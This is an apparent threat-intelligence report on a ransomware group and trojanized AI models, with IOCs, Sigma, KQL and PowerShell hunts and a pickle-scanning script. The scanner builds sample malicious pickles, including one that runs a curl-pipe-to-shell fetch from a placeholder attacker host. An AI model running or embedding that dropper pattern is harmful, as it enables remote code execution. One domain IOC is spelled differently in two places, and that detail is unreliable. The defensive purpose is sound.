Recent OTX pulses highlight a dual-threat landscape characterized by a sophisticated, high-volume Ransomware-as-a-Service (RaaS) operation and a proliferating AI supply chain attack campaign.
The Gentlemen (Storm-2697): Emerging from a split with the Qilin ransomware group, "The Gentlemen" has rapidly escalated into a major threat. Operating with a structured affiliate model, this group leverages Go-based ransomware binaries for fast encryption and utilizes a toolset including SystemBC (C2 tunneling), Cobalt Strike, and AnyDesk for lateral movement. Notably, the group exhibits a high success rate, with approximately 71-78% of victims paying ransoms to avoid public leaks. They are actively exploiting CVE-2024-55591 to gain initial access.
AI Supply Chain Compromise: A separate campaign targets the AI development ecosystem, specifically Hugging Face and ClawHub. Threat actors are trojanizing models and datasets to deliver the AMOS Stealer and cryptominers. By poisoning "skills" and repositories, attackers exploit the implicit trust developers place in open-source AI libraries, allowing for initial access into finance and technology sectors.
Threat Actor / Malware Profile
The Gentlemen (Storm-2697)
- Origin: Split from Qilin ransomware in mid-2025 due to payment disputes. Likely affiliated with Russian-speaking actor 'hastalamuerte'.
- Tooling:
- Go Binary Ransomware: Custom-built for speed and cross-platform capability.
- SystemBC: A robust RAT and proxy tool used to maintain C2 communications and bypass network restrictions.
- PowerRun: Used for UAC bypass to execute payloads with elevated privileges.
- Cobalt Strike: Used for post-exploitation and lateral movement.
- TTPs: Double extortion, affiliate-driven operations, exploitation of external-facing services (CVE-2024-55591).
AI Supply Chain (AMOS Stealer)
- Vector: Trojanized models on Hugging Face and ClawHub; malicious "skills" (over 575 identified).
- Payload: AMOS Stealer (targeting macOS and Windows), cryptominers.
- Mechanism: Malicious code embedded within serialized model weights (the Python pickle format used by legacy PyTorch checkpoints) or in loading scripts triggers when the model is loaded, fetching second-stage payloads from attacker-controlled infrastructure (e.g., install.app-distribution.net).
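The loading-time trigger described above, as an added example that is not code from the pulses, Hugging Face or PyTorch: a static triage of a downloaded model that walks the pickle opcode stream instead of unpickling it, so nothing in the file executes, and lists every import the file would perform that is not on an allowlist. The allowlist, the sample pickles, the zip container and the safetensors blob are constructed here for illustration, and attacker.invalid is a placeholder host.

```python
"""Static triage of a downloaded model artifact before anything loads it.
Added example for this write-up (not code from the OTX pulses, Hugging Face or
PyTorch). Allowlist, sample pickles, zip and safetensors blob are constructed."""
import io
import json
import os
import pickle
import pickletools
import struct
import zipfile

# Imports a legitimate PyTorch/numpy checkpoint needs. Assumed starting point:
# derive the real list from a known-good checkpoint of the same framework.
SAFE_GLOBALS = {
    "collections.OrderedDict", "torch._utils._rebuild_tensor_v2",
    "torch._utils._rebuild_parameter", "torch.FloatStorage", "torch.HalfStorage",
    "torch.LongStorage", "numpy.core.multiarray._reconstruct", "numpy.ndarray", "numpy.dtype",
}
STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING",
              "UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}


def pickle_globals(data: bytes) -> list[tuple[str, str]]:
    """Every (module, name) the pickle would import, found without unpickling.
    GLOBAL/INST carry "module name" inline (protocols 0-3); STACK_GLOBAL (4+)
    takes the two strings pushed before it, possibly via the memo (BINGET)."""
    found, pushed, memo, prev_str = [], [], {}, False
    for op, arg, _pos in pickletools.genops(io.BytesIO(data)):
        if op.name in STRING_OPS:
            pushed.append(arg)
            prev_str = True
        elif op.name in ("GET", "BINGET", "LONG_BINGET"):
            pushed.append(memo.get(arg))
            prev_str = True
        elif op.name == "MEMOIZE":                       # memoizes top of stack
            memo[len(memo)] = pushed[-1] if prev_str else None
        elif op.name in ("PUT", "BINPUT", "LONG_BINPUT"):
            memo[arg] = pushed[-1] if prev_str else None
        else:
            if op.name in ("GLOBAL", "INST"):
                module, name = arg.split(" ", 1)
                found.append((module, name))
            elif op.name == "STACK_GLOBAL" and len(pushed) >= 2:
                found.append((str(pushed[-2]), str(pushed[-1])))
            prev_str = False
    return found


def scan_pickle(data: bytes) -> list[str]:
    """Qualified names the pickle imports that are not on the allowlist."""
    return [f"{m}.{n}" for m, n in pickle_globals(data) if f"{m}.{n}" not in SAFE_GLOBALS]


def scan_model_bytes(data: bytes) -> dict[str, list[str]]:
    """Scan a raw pickle (.pkl, legacy .bin) or a torch.save zip (.pt/.pth, modern .bin)."""
    if data.startswith(b"PK\x03\x04"):
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return {m: scan_pickle(zf.read(m)) for m in zf.namelist() if m.endswith(".pkl")}
    return {"<pickle>": scan_pickle(data)}


def is_valid_safetensors(data: bytes) -> bool:
    """Well-formed safetensors header: u64 LE length, then a JSON dict of tensor entries.
    A '.safetensors' file that fails this is not what it claims to be: treat it as a pickle."""
    if len(data) < 8:
        return False
    n = struct.unpack("<Q", data[:8])[0]
    if n == 0 or n > 100_000_000 or 8 + n > len(data):
        return False
    try:
        header = json.loads(data[8:8 + n])
    except ValueError:                                   # covers UnicodeDecodeError too
        return False
    return isinstance(header, dict) and all(
        k == "__metadata__" or (isinstance(v, dict) and {"dtype", "shape", "data_offsets"} <= set(v))
        for k, v in header.items())


# Constructed samples, not pulse artifacts; attacker.invalid is a placeholder host.
BENIGN_PICKLE = pickle.dumps({"weights": [0.1, 0.2, 0.3], "labels": ["cat", "dog"]}, protocol=4)
# Protocol-0 dropper: GLOBAL os.system, one-element tuple, REDUCE -> runs the string on load.
MALICIOUS_PICKLE = b"cos\nsystem\n(S'curl -fsSL http://attacker.invalid/stage2 | sh'\ntR."


class _Dropper:
    """Shape of a trojanized object; pickling it is harmless, unpickling runs the command."""
    def __reduce__(self):
        return (os.system, ("curl -fsSL http://attacker.invalid/stage2 | sh",))


MALICIOUS_PROTO4 = pickle.dumps(_Dropper(), protocol=4)   # emits STACK_GLOBAL
_buf = io.BytesIO()
with zipfile.ZipFile(_buf, "w") as _zf:                  # mimics the torch.save container
    _zf.writestr("archive/data.pkl", MALICIOUS_PROTO4)
    _zf.writestr("archive/version", "3\n")
TORCH_ZIP_SAMPLE = _buf.getvalue()
_hdr = json.dumps({"w": {"dtype": "F32", "shape": [2], "data_offsets": [0, 8]}}).encode()
SAFETENSORS_SAMPLE = struct.pack("<Q", len(_hdr)) + _hdr + b"\x00" * 8

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_PICKLE), ("proto0 dropper", MALICIOUS_PICKLE),
                        ("torch zip", TORCH_ZIP_SAMPLE)):
        print(f"{label:15s}: {scan_model_bytes(blob)}")
    print("safetensors header ok:", is_valid_safetensors(SAFETENSORS_SAMPLE))
```

The protocol-0 dropper is hand-written; the protocol-4 one is produced by pickling an object whose __reduce__ names os.system, which is exactly what a trojanized checkpoint carries and why triage must never call pickle.load on the file. Where the upstream repository offers safetensors, prefer it and verify the header rather than trusting the extension.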
IOC Analysis
The provided indicators include:
- File Hashes: Multiple MD5, SHA1, and SHA256 hashes associated with The Gentlemen ransomware binaries, payloads, and the AMOS Stealer.
- CVE: CVE-2024-55591 (Fortinet FortiOS/FortiProxy authentication bypass) is the initial access vector used by The Gentlemen affiliates; it is reachable only where the FortiGate administrative interface is exposed.
- Network Infrastructure: Tor onion addresses (*.onion) for data leak sites and negotiation, and clear-web IPs (91.92.242.30) used for payload delivery in the AI supply chain attacks.
- Domains: velvet-parret.com and app-distribution.net serve as drop zones.
Operational Guidance: SOC teams should load the hashes into EDR block and quarantine policies. The onion addresses are the group's leak-site and negotiation portals; they never appear in corporate DNS, proxy or TLS-inspection logs, because Tor resolves them inside its own circuits and an inspecting proxy only ever sees the connection to a Tor guard node. Block and alert on Tor client activity itself (Tor Browser or tor.exe execution, connections to known Tor entry nodes) and keep the onion addresses for recognising the leak site and negotiation portal, not as proxy rules. Block the clear-web IP and domains on firewalls and DNS sinkholes.
Detection Engineering
```yaml
title: Potential The Gentlemen RaaS Activity via PowerRun
id: 88776655-4433-2211-0000-112233445566
status: experimental
description: Detects execution of PowerRun.exe, a tool frequently abused by The Gentlemen affiliates for UAC bypass and execution of ransomware payloads.
author: Security Arsenal
date: 2026-06-12
references:
  - https://otx.alienvault.com/pulse/LBIOC-20260071
tags:
  - attack.privilege_escalation
  - attack.t1548.002
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\PowerRun.exe'
    CommandLine|contains:
      - '/c'
      - 'cmd.exe'
  condition: selection
falsepositives:
  - Legitimate administrative usage
level: high
```
```yaml
title: SystemBC RAT Network Traffic
id: 99887766-5544-3322-1111-223344556677
status: experimental
description: Detects outbound HTTP/HTTPS connections initiated by executables running from user-writable directories, a pattern consistent with the SystemBC proxy/backdoor deployed by The Gentlemen operators. Without the Image restriction the rule would match every outbound web connection on the host; baseline it before alerting.
author: Security Arsenal
date: 2026-06-12
references:
  - https://otx.alienvault.com/pulse/LBIOC-20260071
tags:
  - attack.command_and_control
  - attack.t1071.001
logsource:
  category: network_connection
  product: windows
detection:
  selection:
    Initiated: 'true'
    DestinationPort:
      - 80
      - 443
    Image|contains:
      - '\AppData\'
      - '\Temp\'
      - '\ProgramData\'
      - '\Users\Public\'
  filter_legit:
    DestinationHostname|endswith:
      - '.microsoft.com'
      - '.windowsupdate.com'
      - '.apple.com'
  condition: selection and not filter_legit
falsepositives:
  - Generic web browsing
  - Per-user installers and updaters that legitimately run from AppData (collaboration and browser updaters)
level: medium
```
```yaml
title: AI Supply Chain Malware Delivery
id: 00112233-4455-6677-8899-001122334455
status: experimental
description: Detects Python or PowerShell command lines that reference the AMOS stealer campaign's delivery infrastructure or the Hugging Face / ClawHub ecosystems it abuses. The two generic keywords match routine data-science activity; keep them for hunting and alert only on the infrastructure terms.
author: Security Arsenal
date: 2026-06-12
references:
  - https://otx.alienvault.com/pulse/LBIOC-20260073
tags:
  - attack.initial_access
  - attack.t1195.002
logsource:
  category: process_creation
  product: windows
detection:
  selection_img:
    Image|endswith:
      - '\python.exe'
      - '\pythonw.exe'
      - '\powershell.exe'
  selection_cli:
    CommandLine|contains:
      - 'huggingface'
      - 'install.app-distribution.net'
      - '91.92.242.30'
      - 'clawhub'
  condition: all of selection_*
falsepositives:
  - Legitimate data science workflows (pip install huggingface_hub, model downloads through the CLI)
level: high
```
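To see how the two process_creation rules above behave before they reach production, here is an added example (not part of the OTX pulses or the Sigma project) that implements just the Sigma features those rules use (endswith, contains, value lists as OR, the selection and "all of selection_*" conditions) and runs them over Sysmon-style events that are constructed, not captured telemetry. Event 1 is a routine pip install that still trips the generic "huggingface" keyword, which is the tuning point the rule's falsepositives entry warns about.

```python
"""Offline check of the process_creation Sigma logic against constructed events.
Added example for this write-up, not pulse or Sigma-project code."""
import re

# Detection sections copied from the two process_creation rules above.
RULES = [
    {"title": "Potential The Gentlemen RaaS Activity via PowerRun",
     "detection": {"selection": {"Image|endswith": "\\PowerRun.exe",
                                 "CommandLine|contains": ["/c", "cmd.exe"]},
                   "condition": "selection"}},
    {"title": "AI Supply Chain Malware Delivery",
     "detection": {"selection_img": {"Image|endswith": ["\\python.exe", "\\pythonw.exe", "\\powershell.exe"]},
                   "selection_cli": {"CommandLine|contains": ["huggingface", "install.app-distribution.net",
                                                              "91.92.242.30", "clawhub"]},
                   "condition": "all of selection_*"}},
]

# Constructed events (not real telemetry). Index 1 is benign but matches 'huggingface'.
EVENTS = [
    {"Image": "C:\\Users\\bob\\Downloads\\PowerRun.exe",
     "CommandLine": "PowerRun.exe cmd.exe /c C:\\ProgramData\\update.exe"},
    {"Image": "C:\\Python312\\python.exe",
     "CommandLine": "python.exe -m pip install huggingface_hub"},
    {"Image": "C:\\Python312\\pythonw.exe",
     "CommandLine": "pythonw.exe loader.py --mirror https://install.app-distribution.net/model.bin"},
    {"Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd.exe /c whoami"},
]


def _field_matches(value, modifier, patterns) -> bool:
    """Sigma string matching is case-insensitive; a list of patterns is OR."""
    if value is None:
        return False
    value = str(value).lower()
    pats = [str(p).lower() for p in (patterns if isinstance(patterns, list) else [patterns])]
    if modifier == "endswith":
        return any(value.endswith(p) for p in pats)
    if modifier == "contains":
        return any(p in value for p in pats)
    if modifier == "startswith":
        return any(value.startswith(p) for p in pats)
    return value in pats                      # no modifier: exact (case-insensitive) equality


def _selection_matches(selection: dict, event: dict) -> bool:
    """Every field in a selection must match (AND)."""
    for key, patterns in selection.items():
        field, _, modifier = key.partition("|")
        if not _field_matches(event.get(field), modifier, patterns):
            return False
    return True


def evaluate(rule: dict, event: dict) -> bool:
    """Evaluate the rule's condition: a bare name, 'all of prefix*', or 'a and not b'."""
    det = rule["detection"]
    results = {n: _selection_matches(s, event) for n, s in det.items() if n != "condition"}
    cond = det["condition"].strip()
    m = re.fullmatch(r"all of (\w+)\*", cond)
    if m:
        return all(v for n, v in results.items() if n.startswith(m.group(1)))
    m = re.fullmatch(r"(\w+) and not (\w+)", cond)
    if m:
        return results[m.group(1)] and not results[m.group(2)]
    return results[cond]


def run_all(rules=RULES, events=EVENTS) -> list[tuple[str, int]]:
    """(rule title, event index) for every rule/event pair that fires."""
    return [(r["title"], i) for r in rules for i, e in enumerate(events) if evaluate(r, e)]


if __name__ == "__main__":
    for title, idx in run_all():
        print(f"{title} <- event {idx}: {EVENTS[idx]['CommandLine']}")
```

Feeding the evaluator a week of real process telemetry exported from the SIEM is the quickest way to size the noise from the generic keywords before deciding which terms stay in the alerting copy of the rule.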
```kql
// Hunt for The Gentlemen ransomware hashes. Advanced Hunting runs one query per
// request, so submit the two queries separately; in~ keeps the match case-insensitive.
DeviceFileEvents
| where SHA256 in~ ("7a311b584497e8133cd85950fec6132904dd5b02388a9feed3f5e057fb891d09",
                    "3ab9575225e00a83a4ac2b534da5a710bdcf6eb72884944c437b5fbe5c5c9235",
                    "4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71")
     or MD5 in~ ("a88daa62751c212b7579a57f1f4ae8f8",
                 "408dd6ade80f2ebbc2e5470a1fb506f1",
                 "4200b46a93c6ab059e2b34ce200c4a5b")
| project Timestamp, DeviceName, FolderPath, FileName, SHA256, MD5, InitiatingProcessAccountName
| order by Timestamp desc

// Hunt for AI supply chain network IOCs. "huggingface" will match every legitimate
// model download; it is there to scope who talks to the ecosystem, not to alert on.
DeviceNetworkEvents
| where RemoteIP == "91.92.242.30"
     or RemoteUrl has_any ("install.app-distribution.net", "velvet-parrot.com", "huggingface")
| project Timestamp, DeviceName, RemoteUrl, RemoteIP, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by Timestamp desc
```
```powershell
# IOC Hunt Script: The Gentlemen & AI Supply Chain
# Scans fixed drives for the listed file hashes, then lists small executables
# dropped into common staging directories during the last 7 days.
$TargetHashes = @(
    "a88daa62751c212b7579a57f1f4ae8f8",                                  # MD5 Gentlemen
    "7a311b584497e8133cd85950fec6132904dd5b02388a9feed3f5e057fb891d09",  # SHA256 Gentlemen
    "3ab9575225e00a83a4ac2b534da5a710bdcf6eb72884944c437b5fbe5c5c9235",  # SHA256 Gentlemen
    "a37f6403fbf28fa0b48863287f4c5a5d",                                  # MD5 AMOS Stealer
    "f0a54f2b44e557854b0a5001c4e10185884af945814786f78b86539014f78a16"   # SHA256 AI Malware
)
# Get-FileHash takes a single -Algorithm value per call, so group the targets by algorithm
$TargetsByAlg = @{
    MD5    = @($TargetHashes | Where-Object { $_.Length -eq 32 })
    SHA256 = @($TargetHashes | Where-Object { $_.Length -eq 64 })
}

Write-Host "[+] Scanning fixed drives for known malicious hashes..." -ForegroundColor Yellow
$Drives = Get-PSDrive -PSProvider FileSystem | Where-Object { $_.Used -gt 0 }
foreach ($Drive in $Drives) {
    Write-Host "Scanning drive $($Drive.Root)..."
    # -File keeps directories out of Get-FileHash; the size cap skips ISOs and VHDs
    # (every remaining file is still hashed twice, so expect a full scan to take a while)
    Get-ChildItem -Path $Drive.Root -File -Recurse -ErrorAction SilentlyContinue |
        Where-Object { $_.Length -le 200MB } |
        ForEach-Object {
            $File = $_
            foreach ($Alg in $TargetsByAlg.Keys) {
                $Hash = Get-FileHash -LiteralPath $File.FullName -Algorithm $Alg -ErrorAction SilentlyContinue
                if ($Hash -and ($Hash.Hash -in $TargetsByAlg[$Alg])) {   # -in compares case-insensitively
                    Write-Host "[!] MALICIOUS FILE FOUND: $($File.FullName) | $Alg : $($Hash.Hash)" -ForegroundColor Red
                }
            }
        }
}

Write-Host "[+] Listing recently dropped small executables in common staging paths..." -ForegroundColor Yellow
$CommonPaths = @($env:APPDATA, $env:LOCALAPPDATA, $env:TEMP, "C:\ProgramData", "C:\Users\Public")
foreach ($Path in $CommonPaths) {
    if ($Path -and (Test-Path -LiteralPath $Path)) {
        # -Include needs wildcard patterns: ".exe" on its own matches only a file literally named ".exe"
        Get-ChildItem -Path $Path -Include *.exe, *.dll, *.ps1 -File -Recurse -ErrorAction SilentlyContinue |
            Where-Object { $_.CreationTime -gt (Get-Date).AddDays(-7) -and $_.Length -lt 500KB } |
            Select-Object FullName, CreationTime, LastWriteTime, Length
    }
}
```
Response Priorities
- Immediate:
- Block all listed IOCs (IPs, Domains, Hashes) at the perimeter and endpoint.
- Patch systems against CVE-2024-55591 immediately.
- Isolate any endpoint where PowerRun.exe, a file matching the listed hashes, or an unsigned Go binary running from a user-writable path was executed.
- 24h:
- Conduct credential reset for accounts used on machines where AMOS Stealer or The Gentlemen infrastructure was detected.
- Review logs for successful VPN/Remote access logins correlating with the infection window.
- 1 Week:
- Implement strict egress filtering for Python/R/Julia package managers and AI repository downloads.
- Audit all AI/ML development environments for unsigned or unverified model files.